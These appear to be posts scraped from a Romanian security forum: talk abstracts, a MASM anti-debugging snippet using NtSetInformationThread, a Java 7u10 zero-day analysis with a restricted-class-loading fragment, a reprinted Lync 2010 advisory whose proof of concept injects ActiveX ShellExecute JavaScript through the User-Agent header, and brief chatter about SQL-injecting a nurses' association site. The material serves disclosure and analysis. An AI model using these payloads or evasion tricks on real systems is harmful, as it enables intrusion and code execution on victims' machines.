  16. The Tor Software Ecosystem Description: THE TOR SOFTWARE ECOSYSTEM At the very beginning, Tor was just a socks proxy that protected the origin and/or destination of your TCP flows. Now the broader Tor ecosystem includes a diverse set of projects -- browser extensions to patch Firefox and Thunderbird's privacy issues, Tor controller libraries to let you interface with the Tor client in your favorite language, network scanners to measure relay performance and look for misbehaving exit relays, LiveCDs, support for the way Android applications expect Tor to behave, full-network simulators and testing frameworks, plugins to make Tor's traffic look like Skype or other protocols, and metrics and measurement tools to keep track of how well everything's working. Many of these tools aim to be useful beyond Tor: making them modular means they're reusable for other anonymity and security projects as well. In this talk, Roger and Jake will walk you through all the tools that make up the Tor software world, and give you a better understanding of which ones need love and how you can help. At the very beginning, Tor was just a socks proxy that protected the origin and/or destination of your TCP flows. Now the broader Tor ecosystem includes a diverse set of projects -- browser extensions to patch Firefox and Thunderbird's privacy issues, Tor controller libraries to let you interface with the Tor client in your favorite language, network scanners to measure relay performance and look for misbehaving exit relays, LiveCDs, support for the way Android applications expect Tor to behave, full-network simulators and testing frameworks, plugins to make Tor's traffic look like Skype or other protocols, and metrics and measurement tools to keep track of how well everything's working. Many of these tools aim to be useful beyond Tor: making them modular means they're reusable for other anonymity and security projects as well. In this talk, Roger and Jake will walk you through all the tools that make up the Tor software world, and give you a better understanding of which ones need love and how you can help. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: The Tor Software Ecosystem
  17. Static Analysis Of Java Class Files For Quickly And Accurately Detecting Web Description: Abstract Attacks such as Cross-Site Scripting, HTTP header injection, and SQL injection take advantage of weaknesses in the way some web applications handle incoming character strings. One technique for defending against injection vulnerabilities is to sanitize untrusted strings using encoding methods. These methods convert the reserved characters in a string to an inert representation which prevents unwanted side effects. However, encoding methods which are insufficiently thorough or improperly integrated into applications can pose a significant security risk. This paper will outline an algorithm for identifying encoding methods through automated analysis of Java bytecode. The approach combines an efficient heuristic search with selective rebuilding and execution of likely candidates. This combination provides a scalable and accurate technique for identifying and profiling code that could constitute a serious weakness in an application. ***** Speakers Arshan Dabirsiaghi. Aspect Security Matthew Paisner, Aspect Security Alex Emsellem, Intern Software Engineer, Aspect Security Intern Software Engineer, Aspect Security Currently pursuing a bachelor's degree in Computer Science. I'm primarily focused on software reverse engineering and exploitation. Around ten years ago I found my first vulnerability in a web application, and remember it vividly. I live for innovative ideas and the cutting-edge. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Static Analysis of Java Class Files for Quickly and Accurately Detecting Web-Language Encoding Methods on Vimeo Sursa: Static Analysis Of Java Class Files For Quickly And Accurately Detecting Web
  18. Wtf - Waf Testing Framework Description: Abstract We will be presenting a new approach to evaluating web application firewall capabilities that is suitable to the real world use case. Our methodology touches on issues like False Positive / False Negative rates, evasion techniques and white listing / black listing balance. We will demonstrate a tool that can be used by organizations to implement the methodology either when choosing an application protection solution or after deployment. ***** Speakers Yaniv Azaria, Security Research Team Leader, Impervia Inc. Yaniv holds a B.Sc and M.Sc in Computer Science. An industry veteran with experience in developing web applications, bio-informatic algorithms and database security products. Was team leader for database security research in Imperva for 3 years and for the past couple of years conducts general database and application security research in general. Amichai Shulman, Co-Founder and CTO of Impervia, Inc. Co-founder and CTO of Imperva Inc with 20 years of information security experience in the military and corporate world. Leading our research group in the areas of vulnerability research as well as hacker intelligence. Holds B.Sc and M.Sc in Computer Science. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: WTF - WAF Testing Framework - Yaniv Azaria and Amichai Shulman on Vimeo Sursa: Wtf - Waf Testing Framework
  19. [h=1]Undocumented API use - NtSetInformationThread[/h]Author: [h=1]drew77[/h] ; Use of the still undocumented NtSetInformationThread. ; .386 .model flat,stdcall option casemap:none include \masm32\include\windows.inc include \masm32\include\user32.inc include \masm32\include\kernel32.inc include \masm32\include\advapi32.inc include \masm32\include\ntdll.inc include \masm32\macros\macros.asm includelib \masm32\lib\kernel32.lib includelib \masm32\lib\user32.lib includelib \masm32\lib\advapi32.lib includelib \masm32\lib\ntdll.lib .data Failed db "Busted.",0 Sample db " ",0 .code start: ; When the function is called, the thread will continue to ; run but a debugger will no longer receive any events ; related to that thread. Among the missing events are that ; the process has terminated, if the main thread is the ; hidden one. This technique is used by ; HyperUnpackMe2, among others. invoke NtSetInformationThread,-2,11h,NULL,NULL ; as of Saturday, January 12, 2013, STILL undocumented ; Details at hxxp://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Thread/NtSetInformationThread.html ;thread detached if debugged ;invoke MessageBox, 0, ADDR Failed, ADDR Sample,MB_ICONINFORMATION invoke ExitProcess,0 end start Sursa: Undocumented API use - NtSetInformationThread - rohitab.com - Forums
  20. Packet Fence 3.6.1 Site packetfence.org PacketFence is a network access control (NAC) system. It is actively maintained and has been deployed in numerous large-scale institutions. It can be used to effectively secure networks, from small to very large heterogeneous networks. PacketFence provides NAC-oriented features such as registration of new network devices, detection of abnormal network activities including from remote snort sensors, isolation of problematic devices, remediation through a captive portal, and registration-based and scheduled vulnerability scans. Download: http://packetstormsecurity.com/files/download/119507/packetfence-3.6.1.tar.gz Sursa: Packet Fence 3.6.1 ? Packet Storm
  21. This write up documents an analysis of the current Java zero-day floating around that affects version 7 update 10. Hello All, We were notified today of ongoing attacks with the use of a new Java vulnerability affecting latest version 7 Update 10 of the software [1][2]. Due to the unpatched status of Issue 50 [3] and some inquiries received regarding whether the attack code found exploited this bug, we had a quick look at the exploit code found in the wild. Below, we are providing you with the results of our analysis. The 0-day attack code that was spotted in the wild today is yet another instance of Java security vulnerabilities that stem from insecure implementation of Reflection API [4]. The new attack is a combination of two vulnerabilities. The first flaw allows to load arbitrary (restricted) classes by the means of findClass method of com.sun.jmx.mbeanserver.MBeanInstantiator class. This can be accomplished by the means of this code: public static Class loadClass(String name) throws Throwable { JmxMBeanServerBuilder jmxbsb=new JmxMBeanServerBuilder(); JmxMBeanServer jmxbs=(JmxMBeanServer)jmxbsb.newMBeanServer("",null,null); MBeanInstantiator mbi=jmxbs.getMBeanInstantiator(); return mbi.findClass(name,(ClassLoader)null); } The problem stems from insecure call to Class.forName() method. The second issue abuses the new Reflection API to successfully obtain and call MethodHandle objects that point to methods and constructors of restricted classes. This second issue relies on invokeWithArguments method call of java.lang.invoke.MethodHandle class, which has been already a subject of a security problem (Issue 32 that we reported to Oracle on Aug 31, 2012). The company had released a fix for Issue 32 in Oct 2012. However, it turns out that the fix was not complete as one can still abuse invokeWithArguments method to setup calls to invokeExact method with a trusted system class as a target method caller. This time the call is however done to methods of new Reflection API (from java.lang.invoke.* package), of which many rely on security checks conducted against the caller of the target method. Oracle's fix for Issue 32 relies on a binding of the MethodHandle object to the caller of a target method / constructor if it denotes a potentially dangerous Reflection API call. This binding has a form of injecting extra stack frame from a caller's Class Loader namespace into the call stack prior to issuing a security sensitive method call. Calls to blacklisted Reflection APIs are detected with the use of isCallerSensitive method of MethodHandleNatives class. The blacklisting however focuses primarily on Core Reflection API (Class.forName(), Class.getMethods(), etc.) and does not take into account the possibility to use new Reflection API calls. As a result, the invokeWithArguments trampoline used in the context of a system (privileged) lookup object may still be abused for gaining access to restricted classes, their methods, etc. The above is important in the context of a security check that is implemented by the Lookup class. Its checkSecurityManager method compares the Class Loader (CL) namespace of the caller class of a target find [*] method (findStatic, findVirtual, etc.) with the CL namespace of a class for which a given find operation is conducted. Access to restricted packages is not checked only if Class Loader namespaces are equal (the case for public lookup object, but also for a trusted method caller such as invokeWithArguments invoked for not blacklisted method). The exploit vector used by the attack code is the same as the one we used for second instance of our Proof of Concept code for Issue 32 (reported to Oracle on 17-Sep-2012). This exploit vector relies on sun.org.mozilla.javascript.internal.GeneratedClassLoader class in order to define a fully privileged attacker's class in a system Class Loader namespace. From that point all security checks can be easily disabled. This is not the first time Oracle fails to "sync" security of Core and new Reflection APIs. Just to mention the Reflection API filter. This is also not the first time Oracle's own investigation / analysis of security issues turns out to be not sufficiently comprehensive. Just to mention Issue 50, which was discovered in the code addressed by the company not so long ago... Bugs are like mushrooms, in many cases they can be found in a close proximity to those already spotted. It looks Oracle either stopped the picking too early or they are still deep in the woods... Thank you. Best Regards Adam Gowdiak --------------------------------------------- Security Explorations http://www.security-explorations.com "We bring security research to the new level" --------------------------------------------- References: [1] Malware don't need Coffee: 0 day 1.7u10 spotted in the Wild - Disable Java Plugin NOW ! http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html [2] New year, new Java zeroday! http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/ [3] [SE-2012-01] Critical security issue affecting Java SE 5/6/7 http://seclists.org/fulldisclosure/2012/Sep/170 [4] SE-2012-01 Details http://www.security-explorations.com/en/SE-2012-01-details.html Via: Java Zero-Day Analysis ? Packet Storm
  22. [h=2]Microsoft Lync 2012 Code Execution Vulnerability[/h] Summary ======= Microsoft Lync 2010 fails to properly sanitize user-supplied input, which can lead to remote code execution. Microsoft was originally notified of this issue December 11, 2012. The details of this issue were made public January 11, 2013. CVE number: Not Assigned Impact: Low Vendor homepage: http://lync.microsoft.com/ Vendor notified: December 11, 2012 Vendor fixed: N/A Credit: Christopher Emerson of White Oak Security (http://www.whiteoaksecurity.com/) Affected Products ================ Confirmed in Microsoft Lync Server 2010, version 4.0.7577.0. Other versions may also be affected. Details ======= Microsoft Lync 2010, version 4.0.7577.4087, fails to sanitize the “User-Agent Header” for meet.domainame.com. By inserting JavaScript into the aforementioned parameters and stacking commands, an attacker can execute arbitrary commands in the context of the application. Impact ====== Malicious users could execute arbitrary applications on the client systems, compromising the confidentiality, integrity and availability of information on the client system. Solution ======== The vendor should implement thorough input validation in order to remove dangerous characters from user supplied data. Additionally, the vendor should implement thorough output encoding in order to display, and not execute, dangerous characters within the browser. Proof-of-Concept (PoC) =================== The following Request is included as a proof of concept. The proof of concept is designed to open notepad.exe when the Request is received by the server. GET /christopher.emerson/JW926520 HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)";var oShell = new ActiveXObject("Shell.Application");var commandtoRun = "C:\\Windows\\notepad.exe";oShell.ShellExecute(commandtoRun,"","","open","1");-" Host: meet.domainname.com Connection: Keep-Alive Cookie: LOCO=yes; icscontext=cnet; ProfileNameCookie=Christopher Below is an abbreviated copy of the Response: HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-MS-Server-Fqdn: domainname.com X-Powered-By: ASP.NET Date: Mon, 07 May 2012 20:26:55 GMT Connection: keep-alive Content-Length: 23901 <!--NOTE: If DOCTYPE element is present, it causes the iFrame to be displayed in a small--> <!--portion of the browser window instead of occupying the full browser window.--> <html xmlns="http://www.w3.org/1999/xhtml" class="reachJoinHtml"> <head> <meta http-equiv="X-UA-Compatible" content="IE=10; IE=9; IE=8; requiresActiveX=true" /> <title>Microsoft Lync</title> <script type="text/javascript"> var reachURL = "https:// domainname.com/Reach/Client/WebPages/ReachJoin.aspx?xml=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48Y29uZi1pbmZvIHhtbG5zOnhzaT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEtaW5zdGFuY2UiIHhtbG5zOnhzZD0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3J0Yy8yMDA5LzA1L3NpbXBsZWpvaW5jb25mZG9jIj48Y29uZi11Y21rLXNpcDpjaHJpc3RvcGhlci5lbWVyc29uQGRvbWFpbm5hbWUuY29tO2dydXU7b3BhcXVlPWFwcDpjb25mOmZvY3VzOmlkOkpXOTI2NTIwPC9jb25mLXVyaT48c2VydmVyLXRpbWU+OTEuODAwNDwvc2VydmVyLXRpbWU+PG9yaWdpbmFsLWluY29taW5nLXVybD5odHRwczovL21lZXQuZG9tYWlubmFtZS5jb20vY2hyaXN0b3BoZXIuZW1lcnNvbi9KVzkyNjUyMDwvb3JpZ2luYWwtaW5jb21pbmctdWNtdy08Y29uZi1rZXk+Slc5MjY1MjA8L2NvbmYta2V5PjwvY29uZi1pbmZiejQh"; var escapedXML = "'\x3c\x3fxml version\x3d\x221.0\x22 encoding\x3d\x22utf-8\x22\x3f\x3e\x3cconf-info xmlns\x3axsi\x3d\x22http\x3a\x2f\x2fwww.w3.org\x2f2001\x2fXMLSchema-instance\x22 xmlns\x3axsd\x3d\x22http\x3a\x2f\x2fwww.w3.org\x2f2001\x2fXMLSchema\x22 xmlns\x3d\x22http\x3a\x2f\x2fschemas.microsoft.com\x2frtc\x2f2009\x2f05\x2fsimplejoinconfdoc\x22\x3e\x3cconf-uri\x3esip\x3achristopher.emerson\x40 domainname.com \x3bgruu\x3bopaque\x3dapp\x3aconf\x3afocus\x3aid\x3aJW926520\x3c\x2fconf-uri\x3e\x3cserver-time\x3e91.8004\x3c\x2fserver-time\x3e\x3coriginal-incoming-url\x3ehttps\x3a\x2f\ x2fmeet.domainname.com \x2fchristopher.emerson\x2fJW926520\x3c\x2foriginal-incoming-url\x3e\x3cconf-key\x3eJW926520\x3c\x2fconf-key\x3e\x3c\x2fconf-info\x3e'"; var showJoinUsingLegacyClientLink = "False"; var validMeeting = "True"; var reachClientRequested = "False"; var currentLanguage = "en-US"; var reachClientProductName = "Lync Web App"; var crackUrlRequest = "True"; var isNokia = "False"; var isAndroid = "False"; var isWinPhone = "False"; var isIPhone = "False"; var isIPad = "False"; var isMobile = "False"; var isUnsupported = "False"; var domainOwnerJoinLauncherUrl = ""; var lyncLaunchLink = "conf:sip:christopher.emerson@ domainname.com ;gruu;opaque=app:conf:focus:id:JW926520%3Frequired-media=audio"; var errorCode = "-1"; var diagInfo = "Machine:MachineNameBrowserId:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)";var oShell = new ActiveXObject("Shell.Application");var commandtoRun = "C:\\Windows\\notepad.exe";oShell.ShellExecute(commandtoRun,"","","open","1");-"Join attempted at:5/7/2012 3:26:55 PM"; var resourceUrl = "/meet/JavaScriptResourceHandler.ashx?lcs_se_w14_onprem4.0.7577.197&language="; Vendor Statement ============== The vulnerability described in this report is a XSS vulnerability in the User-Agent which requires an attacker to be in a man-in-the middle situation in order to be able to modify the User-Agent. In a default configuration of Lync server, TLS encryption is used to protect against this type of attack. Customers concerned about this issue should check their environments to ensure that Lync is configured to use TLS to encrypt all traffic, a default configuration. Disclosure Timeline ============== December 11, 2012: Disclosed to vendor (Microsoft Security Response Center). December 18, 2012: Vendor’s initial response. December 20, 2012: Vendor deemed issue a Low severity and confirmed issue would be fixed in next product release. December 27, 2012: Received vendor approval to disclose along with Vendor Statement (see above). January 11, 2013: Disclosed vulnerability publicly ( http://whiteoaksecurity.com/blog/2013/1/11/microsoft-lync-server-2010-remote-code-executionxss-user-agent-header ). ===================================================================== # 3C8F2163853A5DE5 1337day.com [2013-01-13] 1A58B10CEE71628B # Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
  23. Era doar o ironie domnule fan Tinkode. Ca sa iti petreci 5 minute pentru a gasi un SQL Injection intr-un site trebuie sa alegi site-ul nu? Tu ai ales "Asociatia Asistentilor Medicali din Banat". Eu doar te-am intrebat: "DE CE?". Trebuie sa ai un motiv nu? Sau a fost doar un dork si acesti "nenorociti" au cazut in primele rezultate Google? Intrebarea mea e simpla: "Care este motivul pentru care ai ales acest site?".
  24. Uau, ce "tinte"... Cum le gasesti?
  25. Sau invata C/C++ si o sa poti programa si pentru frigider sau cuptorul cu microunde...
×
×
  • Create New...